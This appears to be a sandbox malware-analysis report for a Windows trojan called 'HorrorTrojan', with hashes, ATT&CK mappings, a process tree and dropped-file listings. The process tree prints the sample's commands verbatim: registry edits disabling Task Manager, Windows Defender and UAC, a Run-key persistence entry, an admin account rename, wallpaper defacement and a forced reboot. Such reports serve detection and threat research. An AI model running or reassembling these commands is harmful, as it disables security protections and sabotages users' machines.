0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0

Analysis

max time kernel
49s
max time network
52s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
28-03-2023 06:49

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0.exe
Size

2.3MB
MD5

4715ca3b58910a9d7d5c20eb1720c2ab
SHA1

53205e63db2aba2eedcd4b8c4cff8ce38b4ec3d0
SHA256

0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0
SHA512

264f85ab848798e02c7786f892e5f0e1a9c1254938d4740f6e15098115b67c61fc66e255e5c340614034e7477ecfce299518a5021fa7ea00923177c1bfa583d0
SSDEEP

49152:atpyaEIgRtPXRFfmiLXhiuKPIQyUxosEF1DsP2l8Qmv0g4xp7fn+lj0:4vEbRtPXrmHJgQZx5EFxDl8t14E

Score

10^/10

evasion persistence ransomware trojan upx

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Executes dropped EXE 1 IoCs

Processes:

CLWCP.exe

pid process

1004 CLWCP.exe
Loads dropped DLL 2 IoCs

Processes:

cmd.exe

pid process

572 cmd.exe
572 cmd.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

pid	process
1004	CLWCP.exe

pid	process
572	cmd.exe
572	cmd.exe

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1240-68-0x0000000000400000-0x0000000000BC3000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\47DA.tmp\kern64.exe	upx
behavioral1/memory/1240-160-0x0000000000400000-0x0000000000BC3000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Kernel = "C:\\HorrorTrojan\\kern64.exe"	reg.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

CLWCP.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Control Panel\Desktop\Wallpaper = "c:\\horrortrojan\\bg.bmp"	CLWCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

872 reg.exe
1892 reg.exe

pid	process
872	reg.exe
1892	reg.exe

Suspicious use of AdjustPrivilegeToken 44 IoCs

Processes:

WMIC.exeAUDIODG.EXE

description	pid	process
Token: SeIncreaseQuotaPrivilege	396	WMIC.exe
Token: SeSecurityPrivilege	396	WMIC.exe
Token: SeTakeOwnershipPrivilege	396	WMIC.exe
Token: SeLoadDriverPrivilege	396	WMIC.exe
Token: SeSystemProfilePrivilege	396	WMIC.exe
Token: SeSystemtimePrivilege	396	WMIC.exe
Token: SeProfSingleProcessPrivilege	396	WMIC.exe
Token: SeIncBasePriorityPrivilege	396	WMIC.exe
Token: SeCreatePagefilePrivilege	396	WMIC.exe
Token: SeBackupPrivilege	396	WMIC.exe
Token: SeRestorePrivilege	396	WMIC.exe
Token: SeShutdownPrivilege	396	WMIC.exe
Token: SeDebugPrivilege	396	WMIC.exe
Token: SeSystemEnvironmentPrivilege	396	WMIC.exe
Token: SeRemoteShutdownPrivilege	396	WMIC.exe
Token: SeUndockPrivilege	396	WMIC.exe
Token: SeManageVolumePrivilege	396	WMIC.exe
Token: 33	396	WMIC.exe
Token: 34	396	WMIC.exe
Token: 35	396	WMIC.exe
Token: SeIncreaseQuotaPrivilege	396	WMIC.exe
Token: SeSecurityPrivilege	396	WMIC.exe
Token: SeTakeOwnershipPrivilege	396	WMIC.exe
Token: SeLoadDriverPrivilege	396	WMIC.exe
Token: SeSystemProfilePrivilege	396	WMIC.exe
Token: SeSystemtimePrivilege	396	WMIC.exe
Token: SeProfSingleProcessPrivilege	396	WMIC.exe
Token: SeIncBasePriorityPrivilege	396	WMIC.exe
Token: SeCreatePagefilePrivilege	396	WMIC.exe
Token: SeBackupPrivilege	396	WMIC.exe
Token: SeRestorePrivilege	396	WMIC.exe
Token: SeShutdownPrivilege	396	WMIC.exe
Token: SeDebugPrivilege	396	WMIC.exe
Token: SeSystemEnvironmentPrivilege	396	WMIC.exe
Token: SeRemoteShutdownPrivilege	396	WMIC.exe
Token: SeUndockPrivilege	396	WMIC.exe
Token: SeManageVolumePrivilege	396	WMIC.exe
Token: 33	396	WMIC.exe
Token: 34	396	WMIC.exe
Token: 35	396	WMIC.exe
Token: 33	1012	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1012	AUDIODG.EXE
Token: 33	1012	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	1012	AUDIODG.EXE

Suspicious use of WriteProcessMemory 36 IoCs

Processes:

0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0.execmd.exe

description	pid	process	target process
PID 1240 wrote to memory of 572	1240	0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0.exe	cmd.exe
PID 1240 wrote to memory of 572	1240	0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0.exe	cmd.exe
PID 1240 wrote to memory of 572	1240	0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0.exe	cmd.exe
PID 1240 wrote to memory of 572	1240	0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0.exe	cmd.exe
PID 572 wrote to memory of 1004	572	cmd.exe	CLWCP.exe
PID 572 wrote to memory of 1004	572	cmd.exe	CLWCP.exe
PID 572 wrote to memory of 1004	572	cmd.exe	CLWCP.exe
PID 572 wrote to memory of 1004	572	cmd.exe	CLWCP.exe
PID 572 wrote to memory of 872	572	cmd.exe	reg.exe
PID 572 wrote to memory of 872	572	cmd.exe	reg.exe
PID 572 wrote to memory of 872	572	cmd.exe	reg.exe
PID 572 wrote to memory of 872	572	cmd.exe	reg.exe
PID 572 wrote to memory of 868	572	cmd.exe	reg.exe
PID 572 wrote to memory of 868	572	cmd.exe	reg.exe
PID 572 wrote to memory of 868	572	cmd.exe	reg.exe
PID 572 wrote to memory of 868	572	cmd.exe	reg.exe
PID 572 wrote to memory of 1684	572	cmd.exe	reg.exe
PID 572 wrote to memory of 1684	572	cmd.exe	reg.exe
PID 572 wrote to memory of 1684	572	cmd.exe	reg.exe
PID 572 wrote to memory of 1684	572	cmd.exe	reg.exe
PID 572 wrote to memory of 1892	572	cmd.exe	reg.exe
PID 572 wrote to memory of 1892	572	cmd.exe	reg.exe
PID 572 wrote to memory of 1892	572	cmd.exe	reg.exe
PID 572 wrote to memory of 1892	572	cmd.exe	reg.exe
PID 572 wrote to memory of 396	572	cmd.exe	WMIC.exe
PID 572 wrote to memory of 396	572	cmd.exe	WMIC.exe
PID 572 wrote to memory of 396	572	cmd.exe	WMIC.exe
PID 572 wrote to memory of 396	572	cmd.exe	WMIC.exe
PID 572 wrote to memory of 112	572	cmd.exe	WScript.exe
PID 572 wrote to memory of 112	572	cmd.exe	WScript.exe
PID 572 wrote to memory of 112	572	cmd.exe	WScript.exe
PID 572 wrote to memory of 112	572	cmd.exe	WScript.exe
PID 572 wrote to memory of 1632	572	cmd.exe	shutdown.exe
PID 572 wrote to memory of 1632	572	cmd.exe	shutdown.exe
PID 572 wrote to memory of 1632	572	cmd.exe	shutdown.exe
PID 572 wrote to memory of 1632	572	cmd.exe	shutdown.exe

C:\Users\Admin\AppData\Local\Temp\0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0.exe
"C:\Users\Admin\AppData\Local\Temp\0e095735ba2333e4a05d21a7d640f06c92408ddbdefeb800e920f6f5d7f24fd0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1240

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\47DA.tmp\HorrorTrojan.bat""
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:572

C:\Users\Admin\AppData\Local\Temp\47DA.tmp\CLWCP.exe
clwcp c:\horrortrojan\bg.bmp
3⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
PID:1004

C:\Windows\SysWOW64\reg.exe
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d /1 /f
3⤵
- Modifies registry key
PID:872

C:\Windows\SysWOW64\reg.exe
Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
3⤵
PID:868

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Kernel" /t REG_SZ /F /D "C:\HorrorTrojan\kern64.exe"
3⤵
- Adds Run key to start application
PID:1684

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
- Modifies registry key
PID:1892

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic useraccount where name='Admin' rename UR_DED
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\47DA.tmp\complete.vbs"
3⤵
PID:112

C:\Windows\SysWOW64\shutdown.exe
shutdown /r /t 00
3⤵
PID:1632

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
1⤵
PID:1588

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x49c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x1
1⤵
PID:1860

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\47DA.tmp\CLWCP.exe
Filesize
505KB

MD5
e62ee6f1efc85cb36d62ab779db6e4ec

SHA1
da07ec94cf2cb2b430e15bd0c5084996a47ee649

SHA256
13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a

SHA512
8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

Download Submit
C:\Users\Admin\AppData\Local\Temp\47DA.tmp\CLWCP.exe
Filesize
505KB

MD5
e62ee6f1efc85cb36d62ab779db6e4ec

SHA1
da07ec94cf2cb2b430e15bd0c5084996a47ee649

SHA256
13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a

SHA512
8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

Download Submit
C:\Users\Admin\AppData\Local\Temp\47DA.tmp\HorrorTrojan.bat
Filesize
6KB

MD5
e4fc7f0e5f204964aa1877570ffb9655

SHA1
d65e05be88a2772fbb59dd6ada48cee04f0f4f59

SHA256
f4905f12b1e4155f9faab7e2937e890da9ddb226fb008f0f3cb1d94ac9d05a5d

SHA512
be8d93ce24eddd1ed97512055527f900588ef8b395c9d78df92eca569ef8f8fe6c4afbc9cb6bdd893227e487e4cdbf1154eebac077c8f6c9fe7012584820f5ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\47DA.tmp\HorrorTrojan.bat
Filesize
6KB

MD5
e4fc7f0e5f204964aa1877570ffb9655

SHA1
d65e05be88a2772fbb59dd6ada48cee04f0f4f59

SHA256
f4905f12b1e4155f9faab7e2937e890da9ddb226fb008f0f3cb1d94ac9d05a5d

SHA512
be8d93ce24eddd1ed97512055527f900588ef8b395c9d78df92eca569ef8f8fe6c4afbc9cb6bdd893227e487e4cdbf1154eebac077c8f6c9fe7012584820f5ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\47DA.tmp\bg.bmp
Filesize
6.6MB

MD5
a605dbeda4f89c1569dd46221c5e85b5

SHA1
5f28ce1e1788a083552b9ac760e57d278467a1f9

SHA256
77897f44096311ddb6d569c2a595eca3967c645f24c274318a51e5346816eb8e

SHA512
e4afa652f0133d51480f1d249c828600d02f024aa2cccfb58a0830a9d0c6ee56906736e6d87554ed25c4e69252536cb7379b60b2867b647966269c965b538610

Download Submit
C:\Users\Admin\AppData\Local\Temp\47DA.tmp\complete.vbs
Filesize
77B

MD5
c6f73e6db67c73b6c161f146c3c12210

SHA1
8ee0301d838839864f003ec015a40be5f331c73a

SHA256
8f6e476dc0d92fecc5a75110404ee32b0fd537de7a52e011c984325e7c18b0aa

SHA512
7b5db6969f55a956714266fe9ba6f49db436dead5db882d82525a6b17b414cac451951f4339e1416a14877881f64fbb2ab1e5007d30d8e3c7c5c815c8e0f0ea8

Download Submit
C:\Users\Admin\AppData\Local\Temp\47DA.tmp\kern64.exe
Filesize
621KB

MD5
56afeca82ab6ecefeeb80a794b66a0b1

SHA1
444f6fef5cae216b648cd10acd98b219ae09355b

SHA256
1931c82abb2b5481c9999c5e16b0dc3291bb1aa44b4729e93266134c057ae9a2

SHA512
9eeeef45ab27c88c93620e0d5e9a2f9fe5512fdaa935118ed0d585a229c10f58e79c0ef2fad15d49ddb822b1aa622d1b347d518cf7cd3eb84e85f146c941c9bc

Download Submit
\??\c:\horrortrojan\bg.bmp
Filesize
6.6MB

MD5
a605dbeda4f89c1569dd46221c5e85b5

SHA1
5f28ce1e1788a083552b9ac760e57d278467a1f9

SHA256
77897f44096311ddb6d569c2a595eca3967c645f24c274318a51e5346816eb8e

SHA512
e4afa652f0133d51480f1d249c828600d02f024aa2cccfb58a0830a9d0c6ee56906736e6d87554ed25c4e69252536cb7379b60b2867b647966269c965b538610

Download Submit
\Users\Admin\AppData\Local\Temp\47DA.tmp\CLWCP.exe
Filesize
505KB

MD5
e62ee6f1efc85cb36d62ab779db6e4ec

SHA1
da07ec94cf2cb2b430e15bd0c5084996a47ee649

SHA256
13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a

SHA512
8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

Download Submit
\Users\Admin\AppData\Local\Temp\47DA.tmp\CLWCP.exe
Filesize
505KB

MD5
e62ee6f1efc85cb36d62ab779db6e4ec

SHA1
da07ec94cf2cb2b430e15bd0c5084996a47ee649

SHA256
13b4ec59785a1b367efb691a3d5c86eb5aaf1ca0062521c4782e1baac6633f8a

SHA512
8142086979ec1ca9675418e94326a40078400aff8587fc613e17164e034badd828e9615589e6cb8b9339da7cdc9bcb8c48e0890c5f288068f4b86ff659670a69

Download Submit
memory/1004-84-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/1004-162-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/1240-68-0x0000000000400000-0x0000000000BC3000-memory.dmp

Filesize
7.8MB

Download
memory/1240-160-0x0000000000400000-0x0000000000BC3000-memory.dmp

Filesize
7.8MB

Download
memory/1588-163-0x0000000002900000-0x0000000002901000-memory.dmp

Filesize
4KB

Download
memory/1860-164-0x0000000002760000-0x0000000002761000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads